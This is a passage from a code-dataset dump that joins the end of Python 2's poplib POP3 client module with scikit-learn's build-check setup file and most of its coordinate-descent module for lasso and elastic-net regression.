self._shortcmd('LIST %s' % which) return self._longcmd('LIST') def retr(self, which): """Retrieve whole message number 'which'. Result is in form ['response', ['line', ...], octets]. """ return self._longcmd('RETR %s' % which) def dele(self, which): """Delete message number 'which'. Result is 'response'. """ return self._shortcmd('DELE %s' % which) def noop(self): """Does nothing. One supposes the response indicates the server is alive. """ return self._shortcmd('NOOP') def rset(self): """Unmark all messages marked for deletion.""" return self._shortcmd('RSET') def quit(self): """Signoff: commit changes on server, unlock mailbox, close connection.""" try: resp = self._shortcmd('QUIT') except error_proto, val: resp = val self.file.close() self.sock.close() del self.file, self.sock return resp #__del__ = quit # optional commands: def rpop(self, user): """Not sure what this does.""" return self._shortcmd('RPOP %s' % user) timestamp = re.compile(r'\+OK.*(<[^>]+>)') def apop(self, user, secret): """Authorisation - only possible if server has supplied a timestamp in initial greeting. Args: user - mailbox user; secret - secret shared between client and server. NB: mailbox is locked by server from here to 'quit()' """ m = self.timestamp.match(self.welcome) if not m: raise error_proto('-ERR APOP not supported by server') import hashlib digest = hashlib.md5(m.group(1)+secret).digest() digest = ''.join(map(lambda x:'%02x'%ord(x), digest)) return self._shortcmd('APOP %s %s' % (user, digest)) def top(self, which, howmuch): """Retrieve message header of message number 'which' and first 'howmuch' lines of message body. Result is in form ['response', ['line', ...], octets]. """ return self._longcmd('TOP %s %s' % (which, howmuch)) def uidl(self, which=None): """Return message digest (unique id) list. If 'which', result contains unique id for that message in the form 'response mesgnum uid', otherwise result is the list ['response', ['mesgnum uid', ...], octets] """ if which is not None: return self._shortcmd('UIDL %s' % which) return self._longcmd('UIDL') try: import ssl except ImportError: pass else: class POP3_SSL(POP3): """POP3 client class over SSL connection Instantiate with: POP3_SSL(hostname, port=995, keyfile=None, certfile=None) hostname - the hostname of the pop3 over ssl server port - port number keyfile - PEM formatted file that countains your private key certfile - PEM formatted certificate chain file See the methods of the parent class POP3 for more documentation. """ def __init__(self, host, port = POP3_SSL_PORT, keyfile = None, certfile = None): self.host = host self.port = port self.keyfile = keyfile self.certfile = certfile self.buffer = "" msg = "getaddrinfo returns an empty list" self.sock = None for res in socket.getaddrinfo(self.host, self.port, 0, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res try: self.sock = socket.socket(af, socktype, proto) self.sock.connect(sa) except socket.error, msg: if self.sock: self.sock.close() self.sock = None continue break if not self.sock: raise socket.error, msg self.file = self.sock.makefile('rb') self.sslobj = ssl.wrap_socket(self.sock, self.keyfile, self.certfile) self._debugging = 0 self.welcome = self._getresp() def _fillBuffer(self): localbuf = self.sslobj.read() if len(localbuf) == 0: raise error_proto('-ERR EOF') self.buffer += localbuf def _getline(self): line = "" renewline = re.compile(r'.*?\n') match = renewline.match(self.buffer) while not match: self._fillBuffer() match = renewline.match(self.buffer) line = match.group(0) self.buffer = renewline.sub('' ,self.buffer, 1) if self._debugging > 1: print '*get*', repr(line) octets = len(line) if line[-2:] == CRLF: return line[:-2], octets if line[0] == CR: return line[1:-1], octets return line[:-1], octets def _putline(self, line): if self._debugging > 1: print '*put*', repr(line) line += CRLF bytes = len(line) while bytes > 0: sent = self.sslobj.write(line) if sent == bytes: break # avoid copy line = line[sent:] bytes = bytes - sent def quit(self): """Signoff: commit changes on server, unlock mailbox, close connection.""" try: resp = self._shortcmd('QUIT') except error_proto, val: resp = val self.sock.close() del self.sslobj, self.sock return resp __all__.append("POP3_SSL") if __name__ == "__main__": import sys a = POP3(sys.argv[1]) print a.getwelcome() a.user(sys.argv[2]) a.pass_(sys.argv[3]) a.list() (numMsgs, totalSize) = a.stat() for i in range(1, numMsgs + 1): (header, msg, octets) = a.retr(i) print "Message %d:" % i for line in msg: print ' ' + line print '-----------------------' a.quit()
chrsrds/scikit-learn
refs/heads/master
sklearn/__check_build/setup.py
113
# Author: Virgile Fritsch <virgile.fritsch@inria.fr> # License: BSD 3 clause import numpy def configuration(parent_package='', top_path=None): from numpy.distutils.misc_util import Configuration config = Configuration('__check_build', parent_package, top_path) config.add_extension('_check_build', sources=['_check_build.pyx'], include_dirs=[numpy.get_include()]) return config if __name__ == '__main__': from numpy.distutils.core import setup setup(**configuration(top_path='').todict())
ashhher3/scikit-learn
refs/heads/master
sklearn/linear_model/coordinate_descent.py
4
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Fabian Pedregosa <fabian.pedregosa@inria.fr> # Olivier Grisel <olivier.grisel@ensta.org> # Gael Varoquaux <gael.varoquaux@inria.fr> # # License: BSD 3 clause import sys import warnings from abc import ABCMeta, abstractmethod import numpy as np from scipy import sparse from .base import LinearModel, _pre_fit from ..base import RegressorMixin from .base import center_data, sparse_center_data from ..utils import check_array, check_X_y from ..utils.validation import check_random_state from ..cross_validation import _check_cv as check_cv from ..externals.joblib import Parallel, delayed from ..externals import six from ..externals.six.moves import xrange from ..utils.extmath import safe_sparse_dot from ..utils.validation import check_is_fitted from ..utils import ConvergenceWarning from . import cd_fast ############################################################################### # Paths functions def _alpha_grid(X, y, Xy=None, l1_ratio=1.0, fit_intercept=True, eps=1e-3, n_alphas=100, normalize=False, copy_X=True): """ Compute the grid of alpha values for elastic net parameter search Parameters ---------- X : {array-like, sparse matrix}, shape (n_samples, n_features) Training data. Pass directly as Fortran-contiguous data to avoid unnecessary memory duplication y : ndarray, shape = (n_samples,) Target values Xy : array-like, optional Xy = np.dot(X.T, y) that can be precomputed. l1_ratio : float The elastic net mixing parameter, with ``0 <= l1_ratio <= 1``. For ``l1_ratio = 0`` the penalty is an L2 penalty. ``For l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2. eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3`` n_alphas : int, optional Number of alphas along the regularization path fit_intercept : bool Fit or not an intercept normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. """ n_samples = len(y) sparse_center = False if Xy is None: X_sparse = sparse.isspmatrix(X) sparse_center = X_sparse and (fit_intercept or normalize) X = check_array(X, 'csc', copy=(copy_X and fit_intercept and not X_sparse)) if not X_sparse: # X can be touched inplace thanks to the above line X, y, _, _, _ = center_data(X, y, fit_intercept, normalize, copy=False) Xy = safe_sparse_dot(X.T, y, dense_output=True) if sparse_center: # Workaround to find alpha_max for sparse matrices. # since we should not destroy the sparsity of such matrices. _, _, X_mean, _, X_std = sparse_center_data(X, y, fit_intercept, normalize) mean_dot = X_mean * np.sum(y) if Xy.ndim == 1: Xy = Xy[:, np.newaxis] if sparse_center: if fit_intercept: Xy -= mean_dot[:, np.newaxis] if normalize: Xy /= X_std[:, np.newaxis] alpha_max = (np.sqrt(np.sum(Xy ** 2, axis=1)).max() / (n_samples * l1_ratio)) alphas = np.logspace(np.log10(alpha_max * eps), np.log10(alpha_max), num=n_alphas)[::-1] return alphas def lasso_path(X, y, eps=1e-3, n_alphas=100, alphas=None, precompute='auto', Xy=None, copy_X=True, coef_init=None, verbose=False, return_n_iter=False, positive=False, **params): """Compute Lasso path with coordinate descent The Lasso optimization function varies for mono and multi-outputs. For mono-output tasks it is:: (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1 For multi-output tasks it is:: (1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. Parameters ---------- X : {array-like, sparse matrix}, shape (n_samples, n_features) Training data. Pass directly as Fortran-contiguous data to avoid unnecessary memory duplication. If ``y`` is mono-output then ``X`` can be sparse. y : ndarray, shape = (n_samples,), or (n_samples, n_outputs) Target values eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3`` n_alphas : int, optional Number of alphas along the regularization path alphas : ndarray, optional List of alphas where to compute the models. If ``None`` alphas are set automatically precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. Xy : array-like, optional Xy = np.dot(X.T, y) that can be precomputed. It is useful only when the Gram matrix is precomputed. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. coef_init : array, shape (n_features, ) | None The initial values of the coefficients. verbose : bool or integer Amount of verbosity. params : kwargs keyword arguments passed to the coordinate descent solver. positive : bool, default False If set to True, forces coefficients to be positive. return_n_iter : bool whether to return the number of iterations or not. Returns ------- alphas : array, shape (n_alphas,) The alphas along the path where models are computed. coefs : array, shape (n_features, n_alphas) or (n_outputs, n_features, n_alphas) Coefficients along the path. dual_gaps : array, shape (n_alphas,) The dual gaps at the end of the optimization for each alpha. n_iters : array-like, shape (n_alphas,) The number of iterations taken by the coordinate descent optimizer to reach the specified tolerance for each alpha. Notes ----- See examples/linear_model/plot_lasso_coordinate_descent_path.py for an example. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. Note that in certain cases, the Lars solver may be significantly faster to implement this functionality. In particular, linear interpolation can be used to retrieve model coefficients between the values output by lars_path Examples --------- Comparing lasso_path and lars_path with interpolation: >>> X = np.array([[1, 2, 3.1], [2.3, 5.4, 4.3]]).T >>> y = np.array([1, 2, 3.1]) >>> # Use lasso_path to compute a coefficient path >>> _, coef_path, _ = lasso_path(X, y, alphas=[5., 1., .5]) >>> print(coef_path) [[ 0. 0. 0.46874778] [ 0.2159048 0.4425765 0.23689075]] >>> # Now use lars_path and 1D linear interpolation to compute the >>> # same path >>> from sklearn.linear_model import lars_path >>> alphas, active, coef_path_lars = lars_path(X, y, method='lasso') >>> from scipy import interpolate >>> coef_path_continuous = interpolate.interp1d(alphas[::-1], ... coef_path_lars[:, ::-1]) >>> print(coef_path_continuous([5., 1., .5])) [[ 0. 0. 0.46915237] [ 0.2159048 0.4425765 0.23668876]] See also -------- lars_path Lasso LassoLars LassoCV LassoLarsCV sklearn.decomposition.sparse_encode """ return enet_path(X, y, l1_ratio=1., eps=eps, n_alphas=n_alphas, alphas=alphas, precompute=precompute, Xy=Xy, copy_X=copy_X, coef_init=coef_init, verbose=verbose, positive=positive, **params) def enet_path(X, y, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None, precompute='auto', Xy=None, copy_X=True, coef_init=None, verbose=False, return_n_iter=False, positive=False, **params): """Compute elastic net path with coordinate descent The elastic net optimization function varies for mono and multi-outputs. For mono-output tasks it is:: 1 / (2 * n_samples) * ||y - Xw||^2_2 + + alpha * l1_ratio * ||w||_1 + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2 For multi-output tasks it is:: (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * l1_ratio * ||W||_21 + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. Parameters ---------- X : {array-like}, shape (n_samples, n_features) Training data. Pass directly as Fortran-contiguous data to avoid unnecessary memory duplication. If ``y`` is mono-output then ``X`` can be sparse. y : ndarray, shape = (n_samples,) or (n_samples, n_outputs) Target values l1_ratio : float, optional float between 0 and 1 passed to elastic net (scaling between l1 and l2 penalties). ``l1_ratio=1`` corresponds to the Lasso eps : float Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3`` n_alphas : int, optional Number of alphas along the regularization path alphas : ndarray, optional List of alphas where to compute the models. If None alphas are set automatically precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. Xy : array-like, optional Xy = np.dot(X.T, y) that can be precomputed. It is useful only when the Gram matrix is precomputed. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. coef_init : array, shape (n_features, ) | None The initial values of the coefficients. verbose : bool or integer Amount of verbosity. params : kwargs keyword arguments passed to the coordinate descent solver. return_n_iter : bool whether to return the number of iterations or not. positive : bool, default False If set to True, forces coefficients to be positive. Returns ------- alphas : array, shape (n_alphas,) The alphas along the path where models are computed. coefs : array, shape (n_features, n_alphas) or (n_outputs, n_features, n_alphas) Coefficients along the path. dual_gaps : array, shape (n_alphas,) The dual gaps at the end of the optimization for each alpha. n_iters : array-like, shape (n_alphas,) The number of iterations taken by the coordinate descent optimizer to reach the specified tolerance for each alpha. (Is returned when ``return_n_iter`` is set to True). Notes ----- See examples/plot_lasso_coordinate_descent_path.py for an example. See also -------- MultiTaskElasticNet MultiTaskElasticNetCV ElasticNet ElasticNetCV """ X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X) n_samples, n_features = X.shape multi_output = False if y.ndim != 1: multi_output = True _, n_outputs = y.shape # MultiTaskElasticNet does not support sparse matrices if not multi_output and sparse.isspmatrix(X): if 'X_mean' in params: # As sparse matrices are not actually centered we need this # to be passed to the CD solver. X_sparse_scaling = params['X_mean'] / params['X_std'] else: X_sparse_scaling = np.zeros(n_features) # X should be normalized and fit already. X, y, X_mean, y_mean, X_std, precompute, Xy = \ _pre_fit(X, y, Xy, precompute, normalize=False, fit_intercept=False, copy=False) if alphas is None: # No need to normalize of fit_intercept: it has been done # above alphas = _alpha_grid(X, y, Xy=Xy, l1_ratio=l1_ratio, fit_intercept=False, eps=eps, n_alphas=n_alphas, normalize=False, copy_X=False) else: alphas = np.sort(alphas)[::-1] # make sure alphas are properly ordered n_alphas = len(alphas) tol = params.get('tol', 1e-4) max_iter = params.get('max_iter', 1000) dual_gaps = np.empty(n_alphas) n_iters = [] rng = check_random_state(params.get('random_state', None)) selection = params.get('selection', 'cyclic') if selection not in ['random', 'cyclic']: raise ValueError("selection should be either random or cyclic.") random = (selection == 'random') models = [] if not multi_output: coefs = np.empty((n_features, n_alphas), dtype=np.float64) else: coefs = np.empty((n_outputs, n_features, n_alphas), dtype=np.float64) if coef_init is None: coef_ = np.asfortranarray(np.zeros(coefs.shape[:-1])) else: coef_ = np.asfortranarray(coef_init) for i, alpha in enumerate(alphas): l1_reg = alpha * l1_ratio * n_samples l2_reg = alpha * (1.0 - l1_ratio) * n_samples if not multi_output and sparse.isspmatrix(X): model = cd_fast.sparse_enet_coordinate_descent( coef_, l1_reg, l2_reg, X.data, X.indices, X.indptr, y, X_sparse_scaling, max_iter, tol, rng, random, positive) elif multi_output: model = cd_fast.enet_coordinate_descent_multi_task( coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random) elif isinstance(precompute, np.ndarray): model = cd_fast.enet_coordinate_descent_gram( coef_, l1_reg, l2_reg, precompute, Xy, y, max_iter, tol, rng, random, positive) elif precompute is False: model = cd_fast.enet_coordinate_descent( coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random, positive) else: raise ValueError("Precompute should be one of True, False, " "'auto' or array-like") coef_, dual_gap_, eps_, n_iter_ = model coefs[..., i] = coef_ dual_gaps[i] = dual_gap_ n_iters.append(n_iter_) if dual_gap_ > eps_: warnings.warn('Objective did not converge.' + ' You might want' + ' to increase the number of iterations', ConvergenceWarning) if verbose: if verbose > 2: print(model) elif verbose > 1: print('Path: %03i out of %03i' % (i, n_alphas)) else: sys.stderr.write('.') if return_n_iter: return alphas, coefs, dual_gaps, n_iters return alphas, coefs, dual_gaps ############################################################################### # ElasticNet model class ElasticNet(LinearModel, RegressorMixin): """Linear regression with combined L1 and L2 priors as regularizer. Minimizes the objective function:: 1 / (2 * n_samples) * ||y - Xw||^2_2 + + alpha * l1_ratio * ||w||_1 + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2 If you are interested in controlling the L1 and L2 penalty separately, keep in mind that this is equivalent to:: a * L1 + b * L2 where:: alpha = a + b and l1_ratio = a / (a + b) The parameter l1_ratio corresponds to alpha in the glmnet R package while alpha corresponds to the lambda parameter in glmnet. Specifically, l1_ratio = 1 is the lasso penalty. Currently, l1_ratio <= 0.01 is not reliable, unless you supply your own sequence of alpha. Parameters ---------- alpha : float Constant that multiplies the penalty terms. Defaults to 1.0 See the notes for the exact mathematical meaning of this parameter. ``alpha = 0`` is equivalent to an ordinary least square, solved by the :class:`LinearRegression` object. For numerical reasons, using ``alpha = 0`` with the Lasso object is not advised and you should prefer the LinearRegression object. l1_ratio : float The ElasticNet mixing parameter, with ``0 <= l1_ratio <= 1``. For ``l1_ratio = 0`` the penalty is an L2 penalty. ``For l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2. fit_intercept : bool Whether the intercept should be estimated or not. If ``False``, the data is assumed to be already centered. normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. For sparse input this option is always ``True`` to preserve sparsity. WARNING : The ``'auto'`` option is deprecated and will be removed in 0.18. max_iter : int, optional The maximum number of iterations copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. warm_start : bool, optional When set to ``True``, reuse the solution of the previous call to fit as initialization, otherwise, just erase the previous solution. positive : bool, optional When set to ``True``, forces the coefficients to be positive. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- coef_ : array, shape = (n_features,) | (n_targets, n_features) parameter vector (w in the cost function formula) sparse_coef_ : scipy.sparse matrix, shape = (n_features, 1) | \ (n_targets, n_features) ``sparse_coef_`` is a readonly property derived from ``coef_`` intercept_ : float | array, shape = (n_targets,) independent term in decision function. n_iter_ : array-like, shape (n_targets,) number of iterations run by the coordinate descent solver to reach the specified tolerance. Notes ----- To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. See also -------- SGDRegressor: implements elastic net regression with incremental training. SGDClassifier: implements logistic regression with elastic net penalty (``SGDClassifier(loss="log", penalty="elasticnet")``). """ path = staticmethod(enet_path) def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True, normalize=False, precompute=False, max_iter=1000, copy_X=True, tol=1e-4, warm_start=False, positive=False, random_state=None, selection='cyclic'): self.alpha = alpha self.l1_ratio = l1_ratio self.coef_ = None self.fit_intercept = fit_intercept self.normalize = normalize self.precompute = precompute self.max_iter = max_iter self.copy_X = copy_X self.tol = tol self.warm_start = warm_start self.positive = positive self.intercept_ = 0.0 self.random_state = random_state self.selection = selection def fit(self, X, y): """Fit model with coordinate descent. Parameters ----------- X : ndarray or scipy.sparse matrix, (n_samples, n_features) Data y : ndarray, shape = (n_samples,) or (n_samples, n_targets) Target Notes ----- Coordinate descent is an algorithm that considers each column of data at a time hence it will automatically convert the X input as a Fortran-contiguous numpy array if necessary. To avoid memory re-allocation it is advised to allocate the initial data in memory directly using that format. """ if self.alpha == 0: warnings.warn("With alpha=0, this algorithm does not converge " "well. You are advised to use the LinearRegression " "estimator", stacklevel=2) if self.precompute == 'auto': warnings.warn("Setting precompute to 'auto', was found to be " "slower even when n_samples > n_features. Hence " "it will be removed in 0.18.", DeprecationWarning, stacklevel=2) X, y = check_X_y(X, y, accept_sparse='csc', dtype=np.float64, order='F', copy=self.copy_X and self.fit_intercept, multi_output=True) X, y, X_mean, y_mean, X_std, precompute, Xy = \ _pre_fit(X, y, None, self.precompute, self.normalize, self.fit_intercept, copy=True) if y.ndim == 1: y = y[:, np.newaxis] if Xy is not None and Xy.ndim == 1: Xy = Xy[:, np.newaxis] n_samples, n_features = X.shape n_targets = y.shape[1] if self.selection not in ['cyclic', 'random']: raise ValueError("selection should be either random or cyclic.") if not self.warm_start or self.coef_ is None: coef_ = np.zeros((n_targets, n_features), dtype=np.float64, order='F') else: coef_ = self.coef_ if coef_.ndim == 1: coef_ = coef_[np.newaxis, :] dual_gaps_ = np.zeros(n_targets, dtype=np.float64) self.n_iter_ = [] for k in xrange(n_targets): if Xy is not None: this_Xy = Xy[:, k] else: this_Xy = None _, this_coef, this_dual_gap, this_iter = \ self.path(X, y[:, k], l1_ratio=self.l1_ratio, eps=None, n_alphas=None, alphas=[self.alpha], precompute=precompute, Xy=this_Xy, fit_intercept=False, normalize=False, copy_X=True, verbose=False, tol=self.tol, positive=self.positive, X_mean=X_mean, X_std=X_std, return_n_iter=True, coef_init=coef_[k], max_iter=self.max_iter, random_state=self.random_state, selection=self.selection) coef_[k] = this_coef[:, 0] dual_gaps_[k] = this_dual_gap[0] self.n_iter_.append(this_iter[0]) if n_targets == 1: self.n_iter_ = self.n_iter_[0] self.coef_, self.dual_gap_ = map(np.squeeze, [coef_, dual_gaps_]) self._set_intercept(X_mean, y_mean, X_std) # return self for chaining fit and predict calls return self @property def sparse_coef_(self): """ sparse representation of the fitted coef """ return sparse.csr_matrix(self.coef_) def decision_function(self, X): """Decision function of the linear model Parameters ---------- X : numpy array or scipy.sparse matrix of shape (n_samples, n_features) Returns ------- T : array, shape = (n_samples,) The predicted decision function """ check_is_fitted(self, 'n_iter_') if sparse.isspmatrix(X): return np.ravel(safe_sparse_dot(self.coef_, X.T, dense_output=True) + self.intercept_) else: return super(ElasticNet, self).decision_function(X) ############################################################################### # Lasso model class Lasso(ElasticNet): """Linear Model trained with L1 prior as regularizer (aka the Lasso) The optimization objective for Lasso is:: (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1 Technically the Lasso model is optimizing the same objective function as the Elastic Net with ``l1_ratio=1.0`` (no L2 penalty). Parameters ---------- alpha : float, optional Constant that multiplies the L1 term. Defaults to 1.0. ``alpha = 0`` is equivalent to an ordinary least square, solved by the :class:`LinearRegression` object. For numerical reasons, using ``alpha = 0`` is with the Lasso object is not advised and you should prefer the LinearRegression object. fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. For sparse input this option is always ``True`` to preserve sparsity. WARNING : The ``'auto'`` option is deprecated and will be removed in 0.18. max_iter : int, optional The maximum number of iterations tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. warm_start : bool, optional When set to True, reuse the solution of the previous call to fit as initialization, otherwise, just erase the previous solution. positive : bool, optional When set to ``True``, forces the coefficients to be positive. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- coef_ : array, shape = (n_features,) | (n_targets, n_features) parameter vector (w in the cost function formula) sparse_coef_ : scipy.sparse matrix, shape = (n_features, 1) | \ (n_targets, n_features) ``sparse_coef_`` is a readonly property derived from ``coef_`` intercept_ : float | array, shape = (n_targets,) independent term in decision function. n_iter_ : int | array-like, shape (n_targets,) number of iterations run by the coordinate descent solver to reach the specified tolerance. Examples -------- >>> from sklearn import linear_model >>> clf = linear_model.Lasso(alpha=0.1) >>> clf.fit([[0,0], [1, 1], [2, 2]], [0, 1, 2]) Lasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000, normalize=False, positive=False, precompute=False, random_state=None, selection='cyclic', tol=0.0001, warm_start=False) >>> print(clf.coef_) [ 0.85 0. ] >>> print(clf.intercept_) 0.15 See also -------- lars_path lasso_path LassoLars LassoCV LassoLarsCV sklearn.decomposition.sparse_encode Notes ----- The algorithm used to fit the model is coordinate descent. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. """ path = staticmethod(enet_path) def __init__(self, alpha=1.0, fit_intercept=True, normalize=False, precompute=False, copy_X=True, max_iter=1000, tol=1e-4, warm_start=False, positive=False, random_state=None, selection='cyclic'): super(Lasso, self).__init__( alpha=alpha, l1_ratio=1.0, fit_intercept=fit_intercept, normalize=normalize, precompute=precompute, copy_X=copy_X, max_iter=max_iter, tol=tol, warm_start=warm_start, positive=positive, random_state=random_state, selection=selection) ############################################################################### # Functions for CV with paths functions def _path_residuals(X, y, train, test, path, path_params, alphas=None, l1_ratio=1, X_order=None, dtype=None): """Returns the MSE for the models computed by 'path' Parameters ---------- X : {array-like, sparse matrix}, shape (n_samples, n_features) Training data. y : array-like, shape (n_samples,) or (n_samples, n_targets) Target values train : list of indices The indices of the train set test : list of indices The indices of the test set path : callable function returning a list of models on the path. See enet_path for an example of signature path_params : dictionary Parameters passed to the path function alphas : array-like, optional Array of float that is used for cross-validation. If not provided, computed using 'path' l1_ratio : float, optional float between 0 and 1 passed to ElasticNet (scaling between l1 and l2 penalties). For ``l1_ratio = 0`` the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2 X_order : {'F', 'C', or None}, optional The order of the arrays expected by the path function to avoid memory copies dtype : a numpy dtype or None The dtype of the arrays expected by the path function to avoid memory copies """ X_train = X[train] y_train = y[train] X_test = X[test] y_test = y[test] fit_intercept = path_params['fit_intercept'] normalize = path_params['normalize'] if y.ndim == 1: precompute = path_params['precompute'] else: # No Gram variant of multi-task exists right now. # Fall back to default enet_multitask precompute = False X_train, y_train, X_mean, y_mean, X_std, precompute, Xy = \ _pre_fit(X_train, y_train, None, precompute, normalize, fit_intercept, copy=False) path_params = path_params.copy() path_params['Xy'] = Xy path_params['X_mean'] = X_mean path_params['X_std'] = X_std path_params['precompute'] = precompute path_params['copy_X'] = False path_params['alphas'] = alphas if 'l1_ratio' in path_params: path_params['l1_ratio'] = l1_ratio # Do the ordering and type casting here, as if it is done in the path, # X is copied and a reference is kept here X_train = check_array(X_train, 'csc', dtype=dtype, order=X_order) alphas, coefs, _ = path(X_train, y_train, **path_params) del X_train, y_train if y.ndim == 1: # Doing this so that it becomes coherent with multioutput. coefs = coefs[np.newaxis, :, :] y_mean = np.atleast_1d(y_mean) y_test = y_test[:, np.newaxis] if normalize: nonzeros = np.flatnonzero(X_std) coefs[:, nonzeros] /= X_std[nonzeros][:, np.newaxis] intercepts = y_mean[:, np.newaxis] - np.dot(X_mean, coefs) if sparse.issparse(X_test): n_order, n_features, n_alphas = coefs.shape # Work around for sparse matices since coefs is a 3-D numpy array. coefs_feature_major = np.rollaxis(coefs, 1) feature_2d = np.reshape(coefs_feature_major, (n_features, -1)) X_test_coefs = safe_sparse_dot(X_test, feature_2d) X_test_coefs = X_test_coefs.reshape(X_test.shape[0], n_order, -1) else: X_test_coefs = safe_sparse_dot(X_test, coefs) residues = X_test_coefs - y_test[:, :, np.newaxis] residues += intercepts this_mses = ((residues ** 2).mean(axis=0)).mean(axis=0) return this_mses class LinearModelCV(six.with_metaclass(ABCMeta, LinearModel)): """Base class for iterative model fitting along a regularization path""" @abstractmethod def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True, normalize=False, precompute='auto', max_iter=1000, tol=1e-4, copy_X=True, cv=None, verbose=False, n_jobs=1, positive=False, random_state=None, selection='cyclic'): self.eps = eps self.n_alphas = n_alphas self.alphas = alphas self.fit_intercept = fit_intercept self.normalize = normalize self.precompute = precompute self.max_iter = max_iter self.tol = tol self.copy_X = copy_X self.cv = cv self.verbose = verbose self.n_jobs = n_jobs self.positive = positive self.random_state = random_state self.selection = selection def fit(self, X, y): """Fit linear model with coordinate descent Fit is on grid of alphas and best alpha estimated by cross-validation. Parameters ---------- X : {array-like}, shape (n_samples, n_features) Training data. Pass directly as float64, Fortran-contiguous data to avoid unnecessary memory duplication. If y is mono-output, X can be sparse. y : array-like, shape (n_samples,) or (n_samples, n_targets) Target values """ y = np.asarray(y, dtype=np.float64) if hasattr(self, 'l1_ratio'): model_str = 'ElasticNet' else: model_str = 'Lasso' if isinstance(self, ElasticNetCV) or isinstance(self, LassoCV): if model_str == 'ElasticNet': model = ElasticNet() else: model = Lasso() if y.ndim > 1: raise ValueError("For multi-task outputs, use " "MultiTask%sCV" % (model_str)) else: if sparse.isspmatrix(X): raise TypeError("X should be dense but a sparse matrix was" "passed") elif y.ndim == 1: raise ValueError("For mono-task outputs, use " "%sCV" % (model_str)) if model_str == 'ElasticNet': model = MultiTaskElasticNet() else: model = MultiTaskLasso() if self.selection not in ["random", "cyclic"]: raise ValueError("selection should be either random or cyclic.") # This makes sure that there is no duplication in memory. # Dealing right with copy_X is important in the following: # Multiple functions touch X and subsamples of X and can induce a # lot of duplication of memory copy_X = self.copy_X and self.fit_intercept if isinstance(X, np.ndarray) or sparse.isspmatrix(X): # Keep a reference to X reference_to_old_X = X # Let us not impose fortran ordering or float64 so far: it is # not useful for the cross-validation loop and will be done # by the model fitting itself X = check_array(X, 'csc', copy=False) if sparse.isspmatrix(X): if not np.may_share_memory(reference_to_old_X.data, X.data): # X is a sparse matrix and has been copied copy_X = False elif not np.may_share_memory(reference_to_old_X, X): # X has been copied copy_X = False del reference_to_old_X else: X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X) copy_X = False if X.shape[0] != y.shape[0]: raise ValueError("X and y have inconsistent dimensions (%d != %d)" % (X.shape[0], y.shape[0])) # All LinearModelCV parameters except 'cv' are acceptable path_params = self.get_params() if 'l1_ratio' in path_params: l1_ratios = np.atleast_1d(path_params['l1_ratio']) # For the first path, we need to set l1_ratio path_params['l1_ratio'] = l1_ratios[0] 